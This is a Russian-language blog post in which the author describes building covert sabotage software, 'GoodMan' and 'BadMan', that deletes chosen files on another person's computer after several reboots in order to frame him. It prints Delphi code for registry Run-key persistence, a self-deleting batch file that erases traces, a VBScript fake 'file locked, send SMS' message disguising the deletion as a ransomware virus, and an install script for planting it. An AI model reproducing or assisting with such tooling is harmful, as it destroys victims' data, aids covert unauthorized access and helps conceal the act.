Рассказали мне историю про хорошего и плохого человека. Заключается она в следуюшем. Жил на свете хороший человек, умный, трудолюбивый, старательный. Разработал он хорошие файлы какие-то, которые сразу же присвоил себе плохой человек. И нет бы спасибо сказать, но плохой человек наоборот по возможности старался подставить хорошего человека. Ну на то он собственно и плохой человек. Обиделься хороший человек и задумал он думу страшную, подставить плохого человека, поудалять вышеуказанные файлы, да так, чтобы никто не догадался...
Так получилось что, додумывать думу пришлось мне. Идея ясна надо на компьютер занести вирус, который бы вынес эти файлы. Но найти этот вирус достаточно сложно, а то вдруг еще чего лишнего поубивает. Поэтому лучше написать самому программку, которая удаляла бы указнные файлы, по истечению какого-то времени, а затем и сама удалялась.
Так как доступ к компу назначения есть, но неизвестно какой уровень компьютерной грамотности у этого доступа. То я решил написать админку для настройки. Получилась отдельная прожка, которую я назвал GoodMan. Состояла она, буквально в следующем, запускается окно, где надо указать через сколько перезапусков файлы удаляться, и собственно сам список этих файлов, затем по нажатию на кнопку "Сохранить", данная информация записывалась бы в ини-файл "c:\windows\badmanset".
Вторым этапом стало написание программы, которая бы использовала сохраненные указания и следовала бы им. Данная программа получила название BadMan. Сама программа совсем не сложная: при каждом запуске читаем ини-файл смотрим сколько она запускалась, прибавляем к этом числу единичку запсиываем обратно. Если запускалось много, то удаляем файлы. Только есть одно замечание - это мленкьая программа, без форм, юнитов и прочего:
program Project2;usesWindows,sysutils,ShellApi,Registry,inifiles;{$R *.res}varBeginТЕКСТ ПРОГРАММЫend;
Все вроде бы ничего, но как-то похоже на деверсию, но не на вирус, так как никаких следов нет. Ну что ж маскируемся. Слышал я когда-то про вирус, котрый блокирует файлы и выдает сообщение с требование отправить смс на короткий номер с целью разблокировки. Закосим под это. Конечно блокировать ничего не будем. Просто создадим файлик на Visual Basic за место исходного файла с тем же именем, куда напишем что-то такое:
MsgBox "Для разблокировки файла отправьте SMS на номер 09666 с текстом 0897659",vbYes+vbCritical,"Файл заблокирован."
Ну что ж замаскировались. Надо теперь как-то запускать нашего "ПлохогоЧеловека", а именно запихать его в автозагрузку системы. Способов сучествет много, лично мне больше приголянулся способ с реестром. Сильно не выпендриваясь:
Reg:=TRegistry.Create;Reg.RootKey:=HKEY_LOCAL_MACHINE;Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true);Reg.WriteString('Start','c:\windows\badman.exe');Reg.CloseKey;Reg.Free;
Теперь у нас все запускается и работает. И вот все файлы удалены. Пришло время удалить себя. Ну удалить из реестра можно по аналогии. Но как удалить самого себя если, мы вроде как еще рабоатем? Ну что-ж, позовем киллера, которого сами и создадим. Этим киллером будет bat-файл. Оказывается он может сам себя удалить. Создаём и запускаем:
assignfile(f,'c:\windows\uninstall.bat');rewrite(f);writeln(f,'@echo off');writeln(f,'del c:\windows\badmanset');writeln(f,':try');writeln(f,'del c:\windows\badman.exe');writeln(f,'if exist c:\windows\badman.exe goto try');writeln(f,'del c:\windows\uninstall.bat');closefile(f);ShellExecute(HInstance, 'open', 'c:\windows\uninstall.bat', nil, nil, SW_SHOWNORMAL);
Ну вот вроде и все. Можно легко указывать "хорошим человеком" цель "плохому человеку", "плохо человека" запихали в автозагрузку, научили его выполнять поставленную цель, маскируя свою работу, и после выполнения задания объяснили как можно самоуничтожиться. Ну и чтобы не путаться в порядке дейтсвий и обилии файлов создадим еще один батничек, который поможет Хорошему человеку, который будет осуществлять проникновение на компьютер Плохого человека, быстро установить нашу ловушку:
Goodman.execopy badman.exe c:\windows\badman.exebadman.exe
Вот наше что-то и готово. Да же не знаю как это назвать, вроде как на вирус не катит в виду своей громозкости, но все-таки вроде бы является вредоносной программой. Однако о вредоносности еще можно поспорить. Так как, на мой взгляд, является преступным сама идея подставить человека, а данная программа все-лишь инстурмент, который позволяет это сделать, причем именно инструмент, так как без вмешательства и установки цели она совершенно безвредна. Остаётся только надеяться на то, что Хороший человек не станет плохим и не будет использовать данную программу многократно в своих личных целях.
Каково же было моё удивление, когда лечить эти "зараженные" принесли мне же...
ОтветитьУдалить